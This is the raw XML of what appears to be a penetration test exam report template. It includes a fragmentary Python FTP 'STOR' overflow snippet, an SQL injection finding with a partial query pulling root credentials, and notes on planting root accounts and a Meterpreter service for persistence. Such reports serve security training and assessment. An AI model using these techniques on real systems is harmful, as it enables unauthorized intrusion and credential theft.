                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">:</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</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a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\nCould not Connect to FTP Server."</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">try</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">ftp.transfercmd(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"STOR "</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> + buffer)</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">except</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">:</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\nDone."</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="10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8325"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2445"/>
            <w:gridCol w:w="8325"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716"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rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command / Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshot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ifconfig</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after="200" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distB="0" distT="0" distL="0" distR="0">
                  <wp:extent cx="5065008" cy="2643876"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="image.png" id="3" name="image3.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="image.png" id="0" name="image3.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5065008" cy="2643876"/>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C1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="16834" w:w="11909" w:orient="portrait"/>
          <w:pgMar w:bottom="566.9291338582677" w:top="566.9291338582677" w:left="566.9291338582677" w:right="566.9291338582677" w:header="720" w:footer="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oloo5y8k9nd2" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.20 - Vulnerability Exploited:  MySQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7vizyupzadse" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.21 - System Vulnerable: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.203.135</w:t>
      </w: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Vulnerability Explanation: </w:t>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 custom web application identified was prone to SQL Injection attacks. When performing the penetration test, John noticed error-based MySQL Injection on the taxid query string parameter. While enumerating table data, John was able to successfully extract login and password credentials that were unencrypted that also matched username and password accounts for the root user account on the operating system. This allowed for a successful breach of the Linux-based operating system as well as all data contained on the system.</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Vulnerability Fix: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Since this is a custom web application, a specific update will not properly solve this issue. The application will need to be programmed to properly sanitize user-input data, ensure that the user is running off of a limited user account, and that any sensitive data stored within the SQL database is properly encrypted. Custom error messages are highly recommended, as it becomes more challenging for the attacker to exploit a given weakness if errors are not being presented back to them</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Severity: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color w:val="aa0716"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="aa0716"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="aa0716"/>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Proof of Concept Code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="100.0" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10777"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="10777"/>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SELECT</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login </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE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id</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AND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user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LIKE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"%root%"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="107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8325"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2445"/>
            <w:gridCol w:w="8325"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command / Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshot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left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL injection URL point</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>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after="200" w:line="360" w:lineRule="auto"/>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171450</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3625215" cy="419100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                  <wp:docPr id="2"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3625215" cy="419100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:draw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left"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gfxi4hbnbdsu" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.0 - Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.</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John added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b909oqmbepl" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.0 – House Cleaning</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The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organization computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.</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After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kfjgkxlrv3ge" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.0 - Additional Items</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This section is placed for any additional items that were not mentioned in the overall report.</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ue06wu74youv" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.0 - References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="16834" w:w="11909" w:orient="portrait"/>
      <w:pgMar w:bottom="141.73228346456693" w:top="566.9291338582677" w:left="566.9291338582677" w:right="566.9291338582677"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jc w:val="right"/>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="Table9"/>
      <w:tblW w:w="10777.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92.3333333333335"/>
      <w:gridCol w:w="3592.3333333333335"/>
      <w:gridCol w:w="3592.3333333333335"/>
      <w:tblGridChange w:id="0">
        <w:tblGrid>
          <w:gridCol w:w="3592.3333333333335"/>
          <w:gridCol w:w="3592.3333333333335"/>
          <w:gridCol w:w="3592.3333333333335"/>
        </w:tblGrid>
      </w:tblGridChange>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit w:val="0"/>
        <w:trHeight w:val="310.83593749999994" w:hRule="atLeast"/>
        <w:tblHeader w:val="0"/>
      </w:trPr>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sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">My Name Here</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color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Month Year</w:t>
          </w:r>
        </w:p>
      </w:tc>
